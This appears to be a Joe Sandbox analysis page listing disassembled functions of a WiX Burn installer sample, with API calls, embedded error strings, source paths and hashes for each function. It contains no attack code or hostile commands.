                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$CompareFree
                                                                                                                                                          • String ID: Failed get attributes for ATOM link.$Failed to allocate ATOM link href.$Failed to allocate ATOM link rel.$Failed to allocate ATOM link title.$Failed to allocate ATOM link type.$Failed to allocate ATOM link value.$Failed to get child nodes of ATOM link element.$Failed to parse ATOM link length.$Failed to parse unknown ATOM link attribute: %ls$Failed to parse unknown ATOM link element: %ls$Failed to process all ATOM link attributes.$Failed to process all ATOM link elements.$comres.dll$crypt32.dll$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                                                                                                          • API String ID: 3589242889-2471402524
                                                                                                                                                          • Opcode ID: 8d488de5f081971132de69643f0bb8fde9a3cc0abe0e654a94ae0999a3a4be33
                                                                                                                                                          • Instruction ID: 8859050fcb0f9d6521be0c27c092f4e14b68b88fb17d5a5c6815f29ff4230d6b
                                                                                                                                                          • Opcode Fuzzy Hash: 8d488de5f081971132de69643f0bb8fde9a3cc0abe0e654a94ae0999a3a4be33
                                                                                                                                                          • Instruction Fuzzy Hash: 85B1C471A80204BBDB119B94CC49FAF7B79EBC5B10F21405AF609B72E0EB749A00DB5D
                                                                                                                                                          Function 00439616 Relevance: 47.6, APIs: 16, Strings: 11, Instructions: 351COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,00439105,?,?), ref: 00439625
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00439105,?,?), ref: 0043962F
                                                                                                                                                          • ResetEvent.KERNEL32(?,?,000000FF,?,?,?,?,00439105,?,?), ref: 004396AC
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00439105,?,?), ref: 004396B6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorEventLast$Reset
                                                                                                                                                          • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %hs$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
                                                                                                                                                          • API String ID: 1970322416-2309543796
                                                                                                                                                          • Opcode ID: 0b00d0f38331d1bdb338f71f623b3615c57987e31691571c811a7c7f8f3525c2
                                                                                                                                                          • Instruction ID: 51f1b6446c630834b62b8ec5a3802152404dc79ef1bafac3c7420446c547d317
                                                                                                                                                          • Opcode Fuzzy Hash: 0b00d0f38331d1bdb338f71f623b3615c57987e31691571c811a7c7f8f3525c2
                                                                                                                                                          • Instruction Fuzzy Hash: 07A1C336A9532173E7316A654C0EF672D185B45B60F22127ABE08BE2D2E6EC8C4096DC
                                                                                                                                                          Function 0040C1DF Relevance: 47.0, APIs: 1, Strings: 30, Instructions: 476COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00422C91,0040951C,x86,0040959C), ref: 0040C1FF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalInitializeSection
                                                                                                                                                          • String ID: $yG$Date$Failed to add built-in variable: %ls.$Failed to add well-known variable: %ls.$InstallerName$InstallerVersion$LogonUser$RebootPending$SeShutdownPrivilege$WixBundleAction$WixBundleActiveParent$WixBundleCommandLineAction$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInProgressName$WixBundleInstalled$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleManufacturer$WixBundleName$WixBundleOriginalSource$WixBundleOriginalSourceFolder$WixBundleProviderKey$WixBundleTag$WixBundleUILevel$WixBundleVersion$d:\a\wix\wix\src\burn\engine\variable.cpp$x86
                                                                                                                                                          • API String ID: 32694325-1426782853
                                                                                                                                                          • Opcode ID: a038d6ac9a36dc735fa910deba064c9bbe6c08f63672600275dac8cd61b7b279
                                                                                                                                                          • Instruction ID: af53c76a940e29da13ad0b15c5532c219145e811318497a92c4d5bf437ae5bf0
                                                                                                                                                          • Opcode Fuzzy Hash: a038d6ac9a36dc735fa910deba064c9bbe6c08f63672600275dac8cd61b7b279
                                                                                                                                                          • Instruction Fuzzy Hash: 52425DB0C117689FDB65CF59C9487CDFAB9BB48704F1085EAD20CB6250D7B80A99CF89
                                                                                                                                                          Function 00421CBE Relevance: 44.2, APIs: 8, Strings: 17, Instructions: 441synchronizationthreadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InitializeCriticalSection.KERNEL32(clbcatq.dll,00000080,00000000,msasn1.dll,000000B0,00000000,000000B0,00000214,00000000,00000000,00000000,clbcatq.dll,?,00000001,?,WixBundleOriginalSource), ref: 00421E9B
                                                                                                                                                            • Part of subcall function 00422B06: CreateThread.KERNEL32(00000000,00000000,004218F0,00000000,00000000,00000000), ref: 00422BA5
                                                                                                                                                            • Part of subcall function 00422B06: GetLastError.KERNEL32(?,00421F0E,00000000,00009003,?,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808), ref: 00422BB9
                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00420C50,?,00000000,00000000), ref: 00421FC5
                                                                                                                                                          • GetLastError.KERNEL32(?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808,?,?,?,?,?), ref: 00421FD2
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,000000FF,?,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808,?), ref: 00422091
                                                                                                                                                          • ReleaseMutex.KERNEL32(00000000,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808,?), ref: 004221DC
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808,?), ref: 004221E5
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808,?), ref: 004221F3
                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,00000001,?,WixBundleOriginalSource,?,?,?,?,?,?,00477808,?), ref: 00422205
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$CreateCriticalErrorLastSectionThread$DeleteInitializeMutexRelease
                                                                                                                                                          • String ID: Another per-user setup is already executing.$Apply cannot be done without a successful Plan.$BA aborted apply begin.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to initialize apply in elevated process.$Failed to register bundle.$Failed to set initial apply variables.$Failed to wait for cache thread after execute.$Failed to wait for cache thread before execute.$Failed while caching, aborting execution.$Plans cannot be applied multiple times.$clbcatq.dll$comres.dll$d:\a\wix\wix\src\burn\engine\core.cpp$msasn1.dll
                                                                                                                                                          • API String ID: 885065316-980604374
                                                                                                                                                          • Opcode ID: 082e85f43843f30b395e3410d35773ebd57535d36c2a83488cc5aabf9cd7ad90
                                                                                                                                                          • Instruction ID: 16344dd9ca08d56e8d3becdd719c362b68f1a608f37b81c7ee8988d0657c9997
                                                                                                                                                          • Opcode Fuzzy Hash: 082e85f43843f30b395e3410d35773ebd57535d36c2a83488cc5aabf9cd7ad90
                                                                                                                                                          • Instruction Fuzzy Hash: FFF1AD70A00715FAEB21DBA1DD46FFFB7B8AB04704F90442BF615B6190E7B8A941CB19
                                                                                                                                                          Function 00405201 Relevance: 44.1, APIs: 10, Strings: 15, Instructions: 391fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(00000024,80000000,00000024,00000000,00000003,08000080,00000000,00000000,00000000,00000024,00000120,00000001,00000000,00000120,00000024,?), ref: 004052F6
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405304
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405316
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CreateFile
                                                                                                                                                          • String ID: *wzSrcPath is null$Failed to allocate memory to read in file: %ls$Failed to completely read file: %ls$Failed to get size of file: %ls$Failed to load file: %ls, too large.$Failed to open file: %ls$Failed to re-allocate memory to read in file: %ls$Failed to read from file: %ls$Failed to seek position %d$Invalid argument pcbDest$Invalid argument ppbDest$Invalid argument wzSrcPath$Start position %d bigger than file '%ls' size %llu$Underflow calculating remaining buffer size.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 1722934493-1793223109
                                                                                                                                                          • Opcode ID: 30e3fd0411f3ea4cdf7b4773148fdc262f2aca75163994e343275964f46cd696
                                                                                                                                                          • Instruction ID: 1c2354ddb4e417755ff3b77177f4c68122f853fe0c28117105180553bdcc1f50
                                                                                                                                                          • Opcode Fuzzy Hash: 30e3fd0411f3ea4cdf7b4773148fdc262f2aca75163994e343275964f46cd696
                                                                                                                                                          • Instruction Fuzzy Hash: 22C1EA71E807157BEB209A548C4EFAF3668DB04B54F11453FBD09BB2C1E6BC4D409EA8
                                                                                                                                                          Function 004752AD Relevance: 42.2, APIs: 8, Strings: 16, Instructions: 236COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,?,?,?,?,?,00475961,?,?), ref: 004752D4
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,?,000000FF,?,?,?,00475961,?,?), ref: 004752EE
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,?,000000FF,?,?,?,00475961,?,?), ref: 0047530C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to allocate enclosure URL.$Failed to allocate memory for digest.$Failed to copy local name.$Failed to decode digest value.$Failed to get string length of digest value.$Invalid digest length (%Iu) for digest algorithm (%u).$Unknown algorithm type for digest.$algorithm$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$name$sha1$sha256$sha512
                                                                                                                                                          • API String ID: 1825529933-3499656293
                                                                                                                                                          • Opcode ID: b78165b77fe698c9768a63c00b24bbcdaeec4d3ebc61b69d5b66370faa4f6b83
                                                                                                                                                          • Instruction ID: 4403052e51fd00c239bc435550204cf33ba61f6b25a43c83351b4ee40c5f7c58
                                                                                                                                                          • Opcode Fuzzy Hash: b78165b77fe698c9768a63c00b24bbcdaeec4d3ebc61b69d5b66370faa4f6b83
                                                                                                                                                          • Instruction Fuzzy Hash: CC711831B84B11B7DB205B458C46F967A65EB25B31F208326F63DBE2E1C7FC99408798
                                                                                                                                                          Function 00450B4E Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 277synchronizationCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000018,00000001,?,00000000,00000000,?,?,004512CC,?,?,?), ref: 00450BA0
                                                                                                                                                          • GetLastError.KERNEL32(?,?,004512CC,?,?,?,?,?,?,?,00000000,00000000), ref: 00450BAD
                                                                                                                                                          • ReleaseMutex.KERNEL32(?), ref: 00450E77
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocCreateErrorEventLastMutexProcessRelease
                                                                                                                                                          • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$d:\a\wix\wix\src\burn\engine\netfxchainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                                                                                                          • API String ID: 1118593306-2143231347
                                                                                                                                                          • Opcode ID: 043ba92809be9bd1fb3edf86cf180b4d0557321ab0c4243b9197f1e63dd715ee
                                                                                                                                                          • Instruction ID: a0aed0de197431c0ae21c4fcea48aef0c9ebab5c10e3384a7d4234879708bd82
                                                                                                                                                          • Opcode Fuzzy Hash: 043ba92809be9bd1fb3edf86cf180b4d0557321ab0c4243b9197f1e63dd715ee
                                                                                                                                                          • Instruction Fuzzy Hash: 0B91277AA41320BBD7219B558C4AF9B3E649F16B11F114166FE08BF2D3D2B8D804C7AD
                                                                                                                                                          Function 0044474E Relevance: 37.1, APIs: 3, Strings: 18, Instructions: 304COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00444792
                                                                                                                                                            • Part of subcall function 00466F79: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,000001D0,00000001,00000120,?,?,?,00471936,00000000), ref: 00466F91
                                                                                                                                                            • Part of subcall function 00466F79: GetProcAddress.KERNEL32(00000000), ref: 00466F98
                                                                                                                                                            • Part of subcall function 00466F79: GetLastError.KERNEL32(?,?,?,00471936,00000000), ref: 00466FC0
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 00444AAE
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 00444ABD
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to ensure WU service was enabled to install MSU package., xrefs: 004449C9
                                                                                                                                                          • "%ls" "%ls" /quiet /norestart, xrefs: 004448F9
                                                                                                                                                          • WixBundleExecutePackageCacheFolder, xrefs: 004448B4, 00444AD7
                                                                                                                                                          • Failed to allocate WUSA.exe path., xrefs: 00444834
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\msuengine.cpp, xrefs: 004447B6, 0044489B, 00444A12
                                                                                                                                                          • wusa.exe, xrefs: 00444821
                                                                                                                                                          • Failed to find System32 directory., xrefs: 00444809
                                                                                                                                                          • Failed to append SysNative directory., xrefs: 004447EA
                                                                                                                                                          • Failed to run MSU process, xrefs: 00444A00
                                                                                                                                                          • /log:, xrefs: 00444933
                                                                                                                                                          • Failed to get action arguments for MSU package., xrefs: 00444854
                                                                                                                                                          • Failed to get cached path for package: %ls, xrefs: 00444889
                                                                                                                                                          • Failed to format MSU install command., xrefs: 0044490D
                                                                                                                                                          • SysNative\, xrefs: 004447DA
                                                                                                                                                          • Failed to build MSU path., xrefs: 004448D9
                                                                                                                                                          • Failed to append log switch to MSU command-line., xrefs: 00444947
                                                                                                                                                          • Failed to determine WOW64 status., xrefs: 004447A4
                                                                                                                                                          • Failed to append log path to MSU command-line., xrefs: 00444973
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                                          • String ID: /log:$"%ls" "%ls" /quiet /norestart$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to format MSU install command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to run MSU process$SysNative\$WixBundleExecutePackageCacheFolder$d:\a\wix\wix\src\burn\engine\msuengine.cpp$wusa.exe
                                                                                                                                                          • API String ID: 1400713077-2343657752
                                                                                                                                                          • Opcode ID: 662ce87fff23f54738fccaa3b9f168a38722e429813bdc5ffcea8d5cdfaf8587
                                                                                                                                                          • Instruction ID: defc4134fd27bc1e909fdb42362613f2f60c5b61988664cbd9993bbfb2b7bacc
                                                                                                                                                          • Opcode Fuzzy Hash: 662ce87fff23f54738fccaa3b9f168a38722e429813bdc5ffcea8d5cdfaf8587
                                                                                                                                                          • Instruction Fuzzy Hash: B7A1B231E80215BBEF229E94CD4AFEF7A65EF44714F100167FA00BA2D1D3B89D509A9D
                                                                                                                                                          Function 004511C1 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 295COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00470106: UuidCreate.RPCRT4(?), ref: 00470129
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 00451554
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 0045156D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$CreateUuid
                                                                                                                                                          • String ID: %ls$%ls /pipe %ls$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate section name.$Failed to append netfx chainer args.$Failed to append user args.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxEvent.%ls$NetFxSection.%ls$d:\a\wix\wix\src\burn\engine\netfxchainer.cpp
                                                                                                                                                          • API String ID: 264999607-1450254906
                                                                                                                                                          • Opcode ID: 57d051f4946af6fa4f05c07971b04e734d6ff694880a0b95cbc3366a853a9804
                                                                                                                                                          • Instruction ID: 1f8aa43ca4d0cd281d94d5f43fd3c7c9b0a85d177df900599632a704ca659e79
                                                                                                                                                          • Opcode Fuzzy Hash: 57d051f4946af6fa4f05c07971b04e734d6ff694880a0b95cbc3366a853a9804
                                                                                                                                                          • Instruction Fuzzy Hash: 91A1C331E40328BBDB219BA4CC46FDE7BB4AB05711F114166FD08FB2A2E6789D44CB58
                                                                                                                                                          Function 0043C33C Relevance: 37.0, APIs: 4, Strings: 17, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array$Failed to resize Detect code array$Failed to resize Patch code array$Failed to resize Upgrade code array$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$d:\a\wix\wix\src\burn\engine\bundlepackageengine.cpp
                                                                                                                                                          • API String ID: 0-1578577752
                                                                                                                                                          • Opcode ID: d9c08f43171cb7e396c93af4fc6fbede44599843a612a70294b969b3338caf90
                                                                                                                                                          • Instruction ID: a05afecbbe306ca99dc7505c35a26fb8fb16c08d2cccaf158de5d8b2ae0baf15
                                                                                                                                                          • Opcode Fuzzy Hash: d9c08f43171cb7e396c93af4fc6fbede44599843a612a70294b969b3338caf90
                                                                                                                                                          • Instruction Fuzzy Hash: 2191D231784305BBDB11CF54CC86F9E3B71EB89B11F20116AF611BB2E1DAB8A941DB49
                                                                                                                                                          Function 0040E0B5 Relevance: 32.0, APIs: 7, Strings: 11, Instructions: 496COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetStringTypeW.KERNEL32(00000001,?,00000001,?,00000018,?,00000000,00000000), ref: 0040E0F0
                                                                                                                                                          • GetStringTypeW.KERNEL32(00000001,?,00000001,00000048), ref: 0040E316
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
